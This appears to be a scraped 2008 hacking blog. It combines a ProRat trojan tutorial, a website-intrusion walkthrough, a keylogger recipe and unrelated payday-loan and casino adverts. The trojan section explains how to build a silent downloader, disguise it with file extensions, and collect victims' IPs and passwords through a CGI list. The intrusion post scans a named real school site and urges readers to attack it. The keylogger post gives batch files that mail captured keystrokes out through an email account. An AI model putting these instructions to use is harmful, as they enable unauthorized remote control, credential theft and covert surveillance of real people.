You have a signed a free area from http://www.tripod.lycos.co.uk/signup/signup.phtml and you got a web hosting like this "http://members.lycos.co.uk/yourarea/" and upload your server that you created with ProRat client to this area.
After you uploaded you server your server address will look like "http://members.lycos.co.uk/yourarea/server.exe" Now the only thing you must do is create a Downloader server.
CREATING DOWNLOADER SERVER :
To create a Downloader server you must click on "'Create" button first. A popup screen menu will appear. Click on "Create Downloader Server" Button and get into the Create Downloader server menu..
When you type the URL on the Downloader server menu it will save it automatically so when you want to cerate another Downloader server it will help you for saving time.
You have to follow this way:
1-URL :
In the Downloader server menu you have to type the URL for the download process that will be done on the target PC. For example: "http://members.lycos.co.uk/yourarea/server.exe"
2-Bind With a File :
You can bind your server\downloader server with a file that you want. You must click on the "Bind the server with a file" button and then the file button will be activated. You can choose a file to be binded with the server now. The extension is not so important you can see the size of binded server in the ''Server Size'' part.
3-Server Extension :
You can choose the extension of Server\Downloader server that you will create. ProRat server supports 5 extensions. You can use these extensions for server: *.exe - *.scr - *.pif - *.com -*.bat
But 2 of them support icons. Other ones don't supports windows icon service. *.exe and *.scr has got icon support so you can choose icon for this extensions.
4-Server Icon :
If you choose a extension that has got an icon support. You can select the one you want to use with the server from the small pictures on the menu, but don't forget icons will make the server size a little bigger then the normal size.
If you want to use these icons click on the ''server icon'' section and select the ''Server icon'' box. Choose one of them and your server will use this icon after created.
If you have done all the settings, you can create Downloader server. Now You only have to Click on "Create Server" button.
After you have created your Downloader server you can change its name. It will automatically download the real server and run it on the target PC with invisibility.
Downloader server will restart it self until it downloads the real server on target PC.
Warning: If the target PC gets disconnected while the Downloader server is downloading the real server from the web host, the downloading process will not resume from the last percentage it will just only restart to download the real server again and If you want a function like resuming the download from a 2kb program you wont behaving fairly against PRO GROUP.
Create CGI victim List
(copy pasted once again)
What is a Victim List? :
Victim list is a system that will let you view the information sent from the server just like the email and icq notifications. The information sent to your CGI list contains your victims IP address, Port number, password etc... that gives you victims all details for connection.
Creating Victim List :
This is one of the biggest differences between other Trojans CGI notifications. ProRat has got the best CGI victim list creator on its own client. You can adjust everything you want when you are creating your victim list. You don't have to loose time in configuring the victim list codes like the other CGI victim lists, and you can choose which language you want to use in CGI victim list.
If you want to create your victim list you must click on the create button and a popup menu will appear, click on create CGI victim list button and you will see 4 boxes and a create cgi files button. The features of the boxes are listed below: :
Victim List Password :
If you want your list protected with a password you must write which password you want to use in the blank box.
CGI Script Name :
You can choose the script name that doesn't contain Turkish characters. If you want to change the name of the cgi list after you created your CGI Victim list will not work. You must change the name when you are creating the file. Default name of your cgi file will be prorat.cgi and it will be the best solution for this problem.
CGI script Data :
You can choose the script name that doesn't contain Turkish characters. If you want to change the name of the dat extension file after you have created it will not work. You must change the name when you are creating your file. Default name for your script data file is log.dat and it's the best solution for this problem. This scripts will save the logs coming from server.
Max Number for List :
This menu will let you view the number of victims in your list. Default number is 100. You can choose every number for this blank but if you choose a number like 10000 explorer will work slow.
After you setup these details. Click on the "Create CGI files" button.
How To Use:
To use this CGI victim list tool. You must have a host with CGI support. You can take a free host from these sites
http://www.netfirms.com
http://www.tripod.lycos.com
After you register an account from a host, you must upload "prorat.cgi and "log.dat" to your hosts cgi-bin folder in ASCII mod. Change the CHMOD for "prorat.cgi" to 755, and change the CHMOD for "log.dat" to 600. If you don't know what is CHMOD please read the following steps.
INSTALL + IMPORTANT THINGS + FREQUENTLY ASKED QUESTIONS:
1-Learn that your hosting supports CGI. If it doesn't have a CGI support use another host with CGI support.
2-Upload your files to the cgi-bin folder on your host and don't forget to check them you should see 2 files in your CGI directory after you upload them.
3-You must upload your files to your host in ASCII mod. If you upload in binary mod your CGI victim list won't work. If you want to solve this problem we recommend to you upload with Cute-Ftp program. Professional FTP programs like Cute-Ftp can automatically choose the mod for extensions of files. If you want more details search upload + ASCII + cgi in http://www.google.com
4-Did you setup the files to CHMOD in you host ?
The value of the Victim lists main file that is "prorat.cgi" must be 755 in CHMOD, and the 'log.dat' value must be 600 in CHMOD.
You can adjust CHMOD after you upload files with Cute-Ftp. Right click on the file and click on CHMOD and follow the steps :
prorat.cgi :
Owner permissions :
[X]READ [X]WR?TE [X]EXECUTE
Group permissions :
[X]READ [ ]WR?TE [X]EXECUTE
Public permisions :
[X]READ [ ]WR?TE [X]EXECUTE
log.dat :
Owner permissions :
[X]READ [X]WR?TE [ ]EXECUTE
Group permissions :
[ ]READ [ ]WR?TE [ ]EXECUTE
Public permisions :
[ ]READ [ ]WR?TE [ ]EXECUTE
5-If you say I did all the settings right but my list didn't work :
Did any edit your prorat.cgi file after you created it? If you edited your prorat.cgi file your list may not work and create a new CGI file.
6-If you say, I'm typing my password into my CGI victim list but my victim list doesn't open we think that you have changed the names of your CGI files after you created them, and this may cause this problem.
Don't forget if you want to change names of files you must name them when you are creating the files from the client, But if you are an advanced user you can open "prorat.cgi" with a text editor and edit the settings as you want to do in "prorat.cgi".
7-If you are typing the correct URL for your victims list but it says "****** named file cannot be found".
If you have a problem like this maybe you forgot to upload "log.dat" file to cgi-bin folder in host or you changed name of the log.dat file after you created it.
8-IF you forgot the password that you put to your victim list. Create a new one and change the new prorat.cgi with the older one and don't forget to note it somewhere.
9-If you have many victims but they don't get listed on your victim list. Open prorat.cgi with a text editor and come to settings part and $show_list = "xxx"; write a value instead of xxx like default number for that is "100" , after you set it, upload and replace t with the old file. If you say I can't do that create a new prorat.cgi from Client and type a bigger value for the max number of list for example 200.
10-if you say I did all the things but I don't know how to connect to my victim list. Type http://yoursite/cgi-bin/prorat.cgi on your browser and you will see your login page. The important point of you CGI URL is the end of your URL be the name of you cgi file of prorat.cgi and type it to the end of your URL.
For example you have a account like http://prorat.netfirms.com and you didn't give the default name for prorat.cgi and instead you used the name counter.cgi. your URL should be like this http://prorat.netfims.com/cgi-bin/counter.cgi
11-if you say I took a host from tripod but it doesn't give me permission to edit manually CHMOD. That is true some hosts don't gives permission for this but we can solve this problem with following steps.
Login on tripod's page with your username and password and go to F?LE MANAGER. Your files will be shown in a special script page and go to cgi-bin folder, check the box next to the ProRat cgi file and click on the button at the left top (EDIT). Now delete all the things in prorat.cgi and copy the prorat.cgi that is in your PC to your host and save it.
12-If you say I did all the things but I can't upload log.dat. Type something on log.dat and try to send it again. After you install your victim list you can delete logs with the button named 'Empty Page' button.
13-If you say that you took a free host with cgi support but the hosting company closed my account.
If you have many victims, this traffic can be alerted to the admin of company or you only use cgi-bin of your account it can alert them too. Now you can open a new account and put a site with 2-3 pages, and put a index and connect to your ex users change the older cgi list link with online editor.
14-If you don't create prorat.cgi with ProRat client and downloaded it from somewhere or if you want to upload it after a long time, you can change it to binary mod while you are editing it or downloading it. Download ProRat Client and create your own Victim list.
15-If you say I tried everything and I did all the things right but my service didn't work:
If your age is under 16;
We recommend you to not use ProRat for a couple of years and instead using ProRat go and play games or use your computer for education.
If your age older than 16 and if you're IQ is normal keep away from the Hack world and close your computer...
***************
Sorry about any spelling errors, new keyboard.
"Let's start a riot!"
Current projects:
NE-T forums
http://netcru.freeforums.org
NE-T Crypt FUD
Nuclear RAT tut
How to hack a website
Posted at Monday, July 28, 2008How to hack a website
First, you want to find out as much about it as you can. So, first, you want to port scan it with nmap (I think its the best port scanner)
Code:
nmap -sT -O -p 1-250 -vv www.thesiteyouwishtohackgoesrighthere.xxx
So, me example would be.
Code:
nmap -sT -O -p 1-250 -vv www.mchs.gsacrd.ab.ca
By the way, that is my school site, hack it if you want to :P
So, then you should get something like this.
this is my nmap result (Click to View)
C:\Documents and Settings\Captian falcon\Desktop\Tools\Reconnaissance\nmap-4.68>
nmap -sT -O -p 1-250 -vv http://www.mchs.gsacrd.ab.ca
Starting Nmap 4.68 ( http://nmap.org ) at 2008-07-27 19:12 Mountain Daylight Tim
e
Initiating Ping Scan at 19:12
Scanning 199.216.233.173 [2 ports]
Completed Ping Scan at 19:12, 0.20s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:12
Completed Parallel DNS resolution of 1 host. at 19:12, 0.03s elapsed
Initiating Connect Scan at 19:12
Scanning gsacrd.ab.ca (199.216.233.173) [250 ports]
Discovered open port 80/tcp on 199.216.233.173
Discovered open port 22/tcp on 199.216.233.173
Discovered open port 21/tcp on 199.216.233.173
Completed Connect Scan at 19:13, 24.94s elapsed (250 total ports)
Initiating OS detection (try #1) against gsacrd.ab.ca (199.216.233.173)
WARNING: RST from 199.216.233.173 port 21 -- is this port really open?
WARNING: RST from 199.216.233.173 port 21 -- is this port really open?
WARNING: RST from 199.216.233.173 port 21 -- is this port really open?
WARNING: RST from 199.216.233.173 port 21 -- is this port really open?
WARNING: RST from 199.216.233.173 port 21 -- is this port really open?
WARNING: RST from 199.216.233.173 port 21 -- is this port really open?
Host gsacrd.ab.ca (199.216.233.173) appears to be up ... good.
Scanned at 2008-07-27 19:12:46 Mountain Daylight Time for 27s
Interesting ports on gsacrd.ab.ca (199.216.233.173):
Not shown: 247 filtered ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
Warning: OSScan results may be unreliable because we could not find at least 1 o
pen and 1 closed port
Device type: general purpose
Running: Apple Mac OS X 10.3.X|10.4.X
OS details: Apple Mac OS X 10.3.9 (Panther) (Darwin 7.9.0, PowerPC), Apple Mac O
S X 10.3.9 (Panther) - 10.4.7 (Tiger) (Darwin 7.9.0 - 8.7.8, PowerPC)
OS Fingerprint:
OS:SCAN(V=4.68%D=7/27%OT=21%CT=%CU=%PV=N%G=N%TM=488D1D2A%P=i686-pc-windows-
OS:windows)OPS(O1=%O2=%O3=%O4=%O5=%O6=)WIN(W1=0%W2=0%W3=0%W4=0%W5=0%W6=0)EC
OS:N(R=Y%DF=N%TG=40%W=0%O=%CC=N%Q=)T1(R=Y%DF=N%TG=40%S=Z%A=S+%F=AR%RD=0%Q=)
OS:T2(R=N)T3(R=N)T4(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)U1(R=N)IE(R=N
OS:)
Read data files from: C:\Documents and Settings\Captian falcon\Desktop\Tools\Rec
onnaissance\nmap-4.68
OS detection performed. Please report any incorrect results at http://nmap.org/s
ubmit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.719 seconds
Raw packets sent: 42 (4348B) | Rcvd: 11 (712B)
Sometimes, it will say that the site is down, if so, put the -P0 at the end (Its a 0 not a o)
So the example would be.
Code:
nmap -sT -O -p 1-250 -vv www.mchs.gsacrd.ab.ca -P0
Alright, now, say that the site has a firewall, so that would mean, that your scan would say 0 open ports :(
But, don't worry. It is still possable to get into the site.
So, next thing you need to do is download netcat
Then, type this is :P
Code:
nc -vv www.mchs.gsacrd.ab.ca 80
Then, when something pops up, you may need to type
Code:
GET test
Then, you should get something like this.
This is what I got from netcat (Click to View)
C:\Documents and Settings\Captian falcon\Desktop\Tools\Backdoor Apps\NETCAT>nc -
vv http://www.mchs.gsacrd.ab.ca 80
DNS fwd/rev mismatch: docs.mchs.gsacrd.ab.ca != gsacrd.ab.ca
docs.mchs.gsacrd.ab.ca [199.216.233.173] 80 (http) open
GET test
Bad Request
Your browser sent a request that this server could not understand.
Invalid URI in request GET test
Apache/1.3.41 Server at http://www.mchs.gsacrd.ab.ca Port 80
sent 9, rcvd 328: NOTSOCK
Fianlly, we have most of what we need.
Next, we telnet to all of the open ports (If you get any)
So, if I were to telnet to the open ports, I would get (Say im telneting to port 22.
Port 22 (Click to View)
SSH-2.0-OpenSSH_4.7
So, to search for the exploit, I would search SSH then (Ctrl+F) 2.0
I would do that for every port I could find open.
Then, look for some exploits for the server type.
To do that, you would search for the server type and version.
MY ecample would be.
Code:
Apache
Then, (ctrl+f) 1.3.41
Then, edit the exploit so that it works onto your site (The one you are hacking) then compile the exploit, run it.
And, if you get a good exploit, you will get into the root of the website, and be able to edit any part of the site you want.
The sky is the limit.
Services & Solutions for Placing High Risk Accounts
Posted at Thursday, July 17, 2008Are your own business included high risk categories? Do you hard to place companies? HighRiskAccount.com can help you with credit card processor, even you are running high risk business such as casino, gaming industry, dating club, Multi Level Marketing, travel services and other high risk business. HighRiskAccount.com will search in their database for processor that suits with your needs, they will not charge an extra cost although you are in high risk business or even you are having a bad credit.
HighRiskAccount.com specializes in merchant account processing for large volume business customers. They have over 10 years experience in placing high risk accounts. HighRiskAccount.com know how difficult it can be to get credit card processing for a high risk business. Merchant banks do not want to handle your account no matter how legal and legit your business maybe. If you want to getting help with your credit card merchant account needs, all you have to do is fill out online form, and within 1-2 business day, their staff representative will contact you for further negotiation.
Protect Yourself from Hackers
Posted at Wednesday, July 09, 2008Protect Yourself from Hackers
"just wrote this guide to give you some tips of which you may not have heard yet. Hopefully, it won't come to a hacker getting in, but if it does...
Tip 1: Hackers cover their tracks. Experienced hackers cover them more thorougly, but amateur hackers sometimes leave things behind. Don't expect them to leave any really big evidence behind; expect more of little things here and there you might find surprising. For example, if you're writing a term paper and a black hat hacker accidently saved it when he took a paragraph out- that's suspicious. Where did that paragraph go? Well, for one thing, now you know he was in that area. Check the folders surrounding the file- you might find something.
Tip 2: Decipher between the type of hackers that are attacking you. Experienced hackers will have a more in depth look around when they penetrate your system. They won't touch much because they know that that won't add too much to their knowledge. But if you know a hacker's been in, and some files are messed with, and you have a log of someone guessing passwords to a file or something of that sort, its probably some newbie who's just starting out. These are the easiest hackers to catch. They usually get so caught up in thoughts like "I'm in!" that they forget the basics, such as work behind a proxy.
Tip to protect yourself
My friend was setting up a webserver once. His first time too, and he wasn't to anxious to set up some good software to protect against hackers and viruses. He didn't put up one IDS, and before you know it, the obvious happened. But this time, a newbie had struck. The nice log files showed, bluntly across the screen, multiple instances of a foreign IP address that stood out. Some stupid newbie had tried to login as "uucp" on my friend's XP computer, with a password of "uucp." Well, that's great, but he also had tried the same user/pass combination three times, enough to get himself logged nicely. Even a semi-brainless user with some form of neurological system knows that uucp isn't a default XP account. Again, excitement toiled this hacker's brain, and maybe if he hadn't done that, along with a few other stupid things, he wouldn't have gotten caught. What other things did he do? Well, lets see. He openned 35 instances of MS-DOS. He tried to clean the printer's heads, and he edited a .gif in notepad. Then he uninstalled a few programs and installed some html editor, and replaced four files with the words "14P." he might as well have posted his phone number. In a few days, we had tracked him down to a
suburban town in Ohio. We let him go, not pressing any charges, because he had done nothing really damaging and had provided me with an example of a moron for this guide.
Tip 3: Don't go crazy if you lose data. Chances are, if it was that important, you would have backed it up anyway. Most hackers nowadays wish they were back in 1989 when they could use a Black Box and having a Rainbow Book actually meant something. Most hackers aren't blackhat, they are whitehat, and some even greyhat. But in the end, most hackers that are in systems aren't satisfied by looking around. From past experiences, I have concluded that many hackers like to remember where've they been. So, what do they do? They either press delete here and there, or copy some files onto their systems. Stupid hackers (yes, there are plenty of stupid hackers) send files to e-mail addresses. Some free email companies will give you the IP of a certain e-mail address's user if you can prove that user has been notoriously hacking you. But most of the time, by the time you get the e-mail addy it's been unused for weeks if not months or years, and services like hotmail have already deleted it.
Tip 4: Save information! Any information that you get from a log file (proxy server IP, things like "14P", e-mail addresses that things were sent to, etc.) should be saved to a floppy disk (they're not floppy anymore, I wish I could get out of the habit of calling them that) incase there's a next time. If you get another attack, from the same proxy, or with similar e-mail addresses (e.g: one says Blackjack 123@something.whatever and the other says Black_jack_45@something.znn.com) you can make an assumption that these hackers are the same people. In that case, it would probably be worth the effort to resolve the IP using the proxy and do a traceroute. Pressing charges is recommended if this is a repeat offender.
Tip 5: Don't be stupid. If you've been hacked, take security to the next level. Hackers do talk about people they've hacked and they do post IPs and e-mail addresses. Proof? Take a look at Defcon Conventions. I've never gone to one, but I've seen the photos. The "Wall of Shame"-type of boards I've seen have IPs and e-mail addresses written all over them in fat red, dry-erase ink. Don't be the one to go searching the Defcon website and find your e-mail address posted on the Wall of Shame board!
Tip 6: Don't rely on luck. Chances are, sometime or another, you're going to be targeted for an attack. Here you can rely on luck. Maybe they'll forget? Maybe they don't know how to do it? If you think this way, a surprise is going to hit your face very hard. Another way you could stupidly rely on luck is by saying this: It's probably just a whitehat. On the contrary, my friend, it's probably just a blackhat. A blackhat with knowledge stored in his head, ready to be used as an ax. It's your data. You take the chance.
Keylogging made easy
Posted at Wednesday, July 09, 2008Keylogging made easy
You will need klogger from:
http://ntsecurity.nu/toolbox/klogger/
You will need a gmail account.
You will need blat from:
http://sourceforge.net/project/showfiles...p_id=81910
And Nircmd:
http://www.nirsoft.net/utils/nircmd.html
Ok put everything in a single directory on a flash drive, or a cd. Just a directory you can drag onto the target computer.
You should have blat.dll blat.exe blat.obj klogger and nircmd.
Ok now we are going to make two .bat files.
One is start.bat and the executable for the program:
nircmd.exe execmd CALL klogger
nircmd.exe execmd CALL go.bat
The next one is go.bat and you will need to do some editing to it.
goto THREE
:THREE
ping 127.0.0.1 -n 100 -w 1000> nul
REM the ping acts as a wait
Blat klogger.txt -to bsdpunk@gmail.com -u bsdpunk@gmail.com -p password -f
bsdpunk@gmail.com -server gsmtp183.google.com
REM Please donĂ¢€™t use my email address use your own and your own password etc.
goto THREE
You should now have blat.dll blat.exe blat.obj go.bat klogger nircmd and start.bat.
Just drag your folder with these files to the target computer and run start.bat.
All About Cookies, You Must Know It
Posted at Wednesday, July 09, 2008All About Cookies, You Must Know It
Internet cookies are incredibly simple, but they are one of those things that have taken on a life of their own. Cookies started receiving tremendous media attention starting in February 2000 because of Internet privacy concerns, and the debate still rages.
On the other hand, cookies provide capabilities that make the Web much easier to navigate. The designers of almost every major site use them because they provide a better user experience and make it much easier to gather accurate information about the site's visitors.
We will take a look at the basic technology behind cookies, as well as some of the features they enable. You will also have the opportunity to see a real-world example of what cookies can and cannot do using a sample page.
Cookie Basics
In April of 2000 I read an in-depth article on Internet privacy in a large, respected newspaper, and that article contained a definition of cookies. Paraphrasing, the definition went like this:
Cookies are programs that web sites put on your hard disk. They sit on your computer gathering information about you and everything you do on the Internet, and whenever the web site wants to it can download all of the information the cookie has collected.
Definitions like that are fairly common in the press. The problem is, none of that information is correct. Cookies are not programs, and they cannot run like a program does. Therefore they cannot gather any information on their own. Nor can they collect any personal information about you from your machine.
Here is a valid definition of a cookie:
A cookie is a piece of text that a web server can store on a user's hard disk. Cookies allow a web site to store information on a user's machine and later retrieve it. The pieces of information are stored as name-value pairs.
For example, a web site might generate a unique ID number for each visitor and store the ID number on each user's machine using a cookie file.
If you use Microsoft's Internet Explorer to browse the web, you can see all of the cookies that are stored on your machine. The most common place for them to reside is in a directory called c:\windows\cookies. When I look in that directory on my machine, I find 165 files. Each file is a text file that contains name-value pairs, and there is one file for each web site that has placed cookies on my machine.
You can see in the directory that each of these files is a simple, normal text file. You can see which web site placed the file on your machine by looking at the file name (the information is also stored inside the file). You can open each file up by clicking on it.
For example, I have visited goto.com, and the site has placed a cookie on my machine. The cookie file for goto.com contains the following information:
UserID A9A3BECE0563982D www.goto.com/
What goto.com has done is stored on my machine a single name-value pair. The name of the pair is UserID,and the value is A9A3BECE0563982D. The first time I visited goto.com, the site assigned me a unique ID value and stored it on my machine.
[Note that there probably are several other values stored in the file after the three shown above. That is housekeeping information for the browser.]
The vast majority of sites store just one piece of information -- a user ID -- on your machine. But there really is no limit -- a site can store as many name-value pairs as it likes.
A name-value pair is simply a named piece of data. It is not a program, and it cannot "do" anything. A web site can retrieve only the information that it has placed on your machine. It cannot retrieve information from other cookie files, nor any other information from your machine.
How Does Cookie Data Move?
As you saw in the previous section, cookie data is simply name-value pairs stored on your hard disk by a web site. That is all that cookie data is. The web site can store the data, and later it receives it back. A web site can only receive the data it has stored on your machine. It cannot look at any other cookie, nor can it look at anything else on your machine.
The data moves in the following manner:
If you type the URL of a web site into your browser, your browser sends a request to the web site for the page. For example, if you type the URL http://www.netcrackers.blogspot.com into your browser, your browser will contact Blogger's server and request its home page.
When the browser does this, it will look on your machine for a cookie file that Blogger has set. If it finds a Blogger cookie file, your browser will send all of the name-value pairs in the file to Blogger's server along with the URL. If it finds no cookie file, it will send no cookie data.
Blogger's web server receives the cookie data and the request for a page. If name-value pairs are received, Blogger can use them.
If no name-value pairs are received, Blogger knows that you have not visited before. The server creates a new ID for you in Blogger's database and then sends name-value pairs to your machine in the header for the web page it sends. Your machine stores the name-value pairs on your hard disk.
The web server can change name-value pairs or add new pairs whenever you visit the site and request a page.
There are other pieces of information that the server can send with the name-value pair. One of these is an expiration date. Another is a path (so that the site can associate different cookie values with different parts of the site). You have control over this process. You can set an option in your browser so that the browser informs you every time a site sends name-value pairs to you. You can then accept or deny the values.
How Do Web Sites Use Cookies?
Cookies evolved because they solve a big problem for the people who implement web sites. In the broadest sense, a cookie allows a site to store state information on your machine. This information lets a web site remember what state your browser is in. An ID is one simple piece of state information -- if an ID exists on your machine, the site knows that you have visited before. The state is, "Your browser has visited the site at least one time", and the site knows your ID from that visit.
Web sites use cookies in many different ways. Here are some of the most common examples:
Sites can accurately determine how many readers actually visit the site. It turns out that because of proxy servers, caching, concentrators and so on, the only way for a site to accurately count visitors is to set a cookie with a unique ID for each visitor. Using cookies, sites can:
->Determine how many visitors arrive
->Determine how many are new vs. repeat visitors
->Determine how often a visitor has visited
The way the site does this is by using a database. The first time a visitor arrives, the site creates a new ID in the database and sends the ID as a cookie. The next time the user comes back, the site can increment a counter associated with that ID in the database and know how many times that visitor returns.
Sites can store user preferences so that the site can look different for each visitor (often referred to as customization). For example, some sites offer you the ability to change content/layout/color. It or allows you to enter your zip code and get customized weather information.
Most sites seem to store preferences like this in the site's database and store nothing but an ID as a cookie, but storing the actual values in name-value pairs is another way to do it.
Ecommerce sites can implement things like shopping carts and "quick checkout" options. The cookie contains an ID and lets the site keep track of you as you add different things to your cart. Each item you add to your shopping cart is stored in the site's database along with your ID value. When you check out, the site knows what is in your cart by retrieving all of your selections from the database. It would be impossible to implement a convenient shopping mechanism without cookies or something like it.
In all of these examples, note that what the database is able to store is things you have selected from the site, pages you have viewed from the site, information you give to the site in online forms, etc. All of the information is stored in the site's database, and a cookie containing your unique ID is all that is stored on your computer in most cases.
An Example
To give you a simple example of what cookies and a database can do, We can take the example of Verizon.com They have created a simple history and statistics system for there articles. There system runs on the Verizon servers and lets you view your activity on the Verizon site. Here's how it works:
When you visit Verizon for the first time, the server creates a unique ID number for you and stores a cookie on your machine containing that ID. For example, on the machine I am using now, this is what I see in the Verizon cookie file:
user 35005 www.verizon.com/
There is nothing magic about the number 35,005 -- it is simply an integer that they increment each time a new visitor arrives. I was user number 35,005 to come to the Verizon site since this cookie system was installed. We could make the ID value as elaborate as we desire -- many sites use IDs containing 20 digits or more.
Now, whenever you visit any page on Verizon, your browser sends your cookie containing the ID value back to the server. The server then saves a record in the database that contains the time that you downloaded the page and the URL, along with your ID.
To see the history of your activity on Verizon, you can go to this URL on the site:
http://www.verizon.com/history.php
Your browser sends your ID value from the cookie file to the server along with the URL. The history.php page runs a piece of code that queries the database and retrieves your history on the site. It also calculates a couple of interesting statistics. Then it creates a page and sends it to your browser.
Try the URL for the history page now:
http://www.verizon.com/history.php
Then go view a couple of other pages on Verizon and try it again. You will see that the statistics change and so does the list of files.
Problems with Cookies
Cookies are not a perfect state mechanism, but they certainly make a lot of things possible that would be impossible otherwise. Here are several of the things that make cookies imperfect.
People often share machines -- Any machine that is used in a public area, and many machines used in an office environment or at home, are shared by multiple people. Let's say that you use a public machine (in a library, for example) to purchase something from an on-line store. The store will leave a cookie on the machine, and someone could later try to purchase something from the store using your account. Stores usually post large warnings about this problem, and that is why. Even so, mistakes can happen.
On something like a Windows NT machine or a UNIX machine that uses accounts properly, this is not a problem. The accounts separate all of the users' cookies. Accounts are much more relaxed in other operating systems, and it is a problem.
If you try the example above on a public machine (in a library or school, for example), and if other people using the machine have visited Verizon, then the history URL may show a very long list of files.
Cookies get erased -- If you have a problem with your browser and call tech support, probably the first thing that tech support will ask you to do is to erase all of the temporary Internet files on your machine. When you do that you lose all of your cookie files. Now when you visit a site again, that site will think you are a new user and assign you a new cookie. This tends to skew the site's record of new versus return visitors, and it also can make it hard for you to recover previously stored preferences. This is why sites ask you to register in some cases -- if you register with a user name and a password, you can re-login even if you lose your cookie file and restore your preferences. If preference values are stored directly on the machine then recovery is impossible. That is why many sites now store all user information in a central database and store only an ID value on the user's machine.
If you erase your cookie file for Verizon and then revisit the history URL in the previous section, you will find that Verizon has no history for you. The site has to create a new ID and cookie file for you, and that new ID has no data stored against it in the database.
Multiple machines -- People often use more than one machine during the day. For example a machine in the office, a machine at home and a laptop for the road. Unless the site is specifically engineered to solve the problem, the result will be three unique cookie files on all three machines. Any site that I visit from all three machines will track me as three separate users. It can be annoying to set preferences three times. Again, a site that allows registration and stores preferences centrally may make it easy for me to have the same account on three machines, but the site developers must plan for this when designing the site.If you visit the history URL demonstrated in the previous section from one machine and then try it again from another, you will find that your history lists are different. This is because the server created two IDs for you on the two machines.
There are probably not any easy solutions to these problems, short of asking users to register and storing everything in a central database.
Why the Fury around Cookies?
If you have read the article to this point, you may be wondering why there has been such an uproar in the media about cookies and Internet privacy. You have seen in this article that cookies are benign text files, and you have also seen that they provide lots of useful capabilities on the web.
There are two things that have caused the strong reaction around cookies:
The first is something that has plagued consumers for decades but is now getting out of hand. Let's say that you purchase something from a traditional mail order catalog. The catalog company has your name, address and phone number from your order, and it also knows what items you have purchased. It can sell your information to others who might want to sell similar products to you. That is the fuel that makes telemarketing and junk mail possible.
On a web site, the site can track not only your purchases, but also the pages that you read, the ads that you click on, etc. If you then purchase something and enter your name and address, the site potentially knows much more about you than a traditional mail order company does. This makes targeting much more precise, and that makes a lot of people uncomfortable.
Different sites have different policies. Many companies have strict privacy policies and do not sell or share any personal information about customers with any third party except in cases where you specifically allow them to do so. Other companies aggregate information together and distribute it.
The second is new. There are certain infrastructure providers that can actually create cookies that are visible on multiple sites. Many firms use these companies to serve ad banners on their sites. These companies place small (1x1 pixels) GIF files on the site that allow them to load cookies on your machine. The companies can then track your movements across multiple sites. It can potentially see the search strings that you type into search engines (due more to the way some search engines implement their systems, not because anything sinister is intended). Because it can gather so much information about you from multiple sites, the companies can form very rich profiles. These are still anonymous, but they are rich.
One company then went one step further by acquiring another firm, it threatened to link these rich anonymous profiles back to name and address information -- it threatened to personalize them, and then sell the data. That began to look very much like spying to most people, and that is what caused the uproar. Some companies are in a unique position to do this sort of thing, because they serve ads on so many sites. Cross-site profiling is not a capability available to individual sites, because cookies are site specific.
State Licensed Cash Advances
Posted at Wednesday, July 09, 2008If you running unforeseen expenses, you can get trapped by debt in the middle of the month. You can not remove these unforeseen expenses, but what you can do is to choose a perfect way to deal with these expenses in the form of payday loans. There are many benefits to obtaining payday loans. One of provider of payday loans companies that have new concept for delivering low costs and better service is PayDay One with their site www.paydayone.com. To obtain a loan, you must have a valid checking account and email address. In most cases loans will be funded the next business day without requiring any faxing of information unless they are unable to verify your application information. Great Rates refers to rates as compared to other similarly licensed online lenders. PayDay One and its affiliates specifically offer payday advances, installment loans and credit services only to residents in those states where permitted by law to get rid of problems due to the unavailability of cash during the extreme financial crunches. It is a short term loan, which may be paid by the next pay day. It is beneficial to you urgently to meet the needs of liquidity in the middle of this month. It also prevents you from asking your friends and other family members for money. People use the payday loans to eliminate the burden of debt until the next pay day.
Unlike other payday loan lenders. Payday One offers :
- Great Rate Guarantee
- No faxing or waiting in lines
- Secure online loan application
- Apply 24/7 from home or work
- Low credit scores are no problem
Payday One offers no fax payday loans with a 24-hour turnaround and direct wire into customer accounts! Its loan application is featured as easy and secure. Anyone can apply online or by telephone – and everyone will get an answer in seconds. All that one needs to apply for a loan from PayDay One is an email address, an active checking account, and a job or regular source of income. And lest I forget, a loan applicant must also be at least 18 years old and a citizen of the United States.
Payday One through their site is dedicated to payday loans. They specialize in getting your a low interest loan for emergencies or just to get you thru to the next month. Payday one is one of state licensed cash advances in the United States. They are not an offshore payday lending company. So you can rest assured that they are a good company. When you’re in an emergency situation, you can count on Payday One to deliever quick 24 hour turnarounds. It’s better then walking into a public establishment. Unlike other payday loan lenders, Payday One offers great rates. They guarantee it.
ARAID Automated Data Backup - Never Lose Data Again
Posted at Friday, July 04, 2008Many corporate employees are not backing up their important files on their PC. It can generating risk losing data when computer problem occurs or hard disk crashes. Many important data file on hard disk need backing up to precaution if any happen occur so you wouldn't regretful. Cause if encounter disk crashes we can't do anything to get it back. So, before it's all happen there is The Accordance Systems ARAID to make backing up effortless for computer users. With The Accordance Systems ARAID, files can be automatic backup on ARAID disks each time the user saves to a designated folder on the hard drive.
ARAID operates in automatic backup, without interrupting the user's on-going work. Having backup and additional data storage is very important to keep your data file saved. ARAID assist employees to prevent such data loss. PC data protection is really important especially viruses and trojan attacking are all over internet. Many viruses and trojan attacking destroy the piece of data even can't recovery it. So if you use backup data with The Accordance Systems ARAID resource can make your data more safe. The Accordance Systems ARAID support on PC RAID system such SATA RAID and IDE RAID. Data file in RAID system will be safe if used the ARAID product from accordance systems. For more information about how to purchase the ARAID product then visit their website and learn how this ARAID protects your data.
Online Casino Directory
Posted at Friday, July 04, 2008Are you want to play online casino games? Do you want to know where the best online casinos sites today? Now there is Online Casino Directory with casino game guides and reviews. If you a beginner this is the right place to find the best online casino site. You can learn how to play online casino game before risking losing money. Online Casino Directory trough their website www.onlinecasinosdir.com provide a directory of online casinos which gives information to help us make a decision which are the best online casinos site to playing. Online casinos now fast becoming a growing influence in the internet, which you can easily see when you consider the countless numbers of online casino websites that have mushroomed in the recent past. They have free casino game guides with rules for a variety of casino games such as Bingo, Craps, Blackjack, Roulette, Online Slots, Texas Holdem and Video Poker.
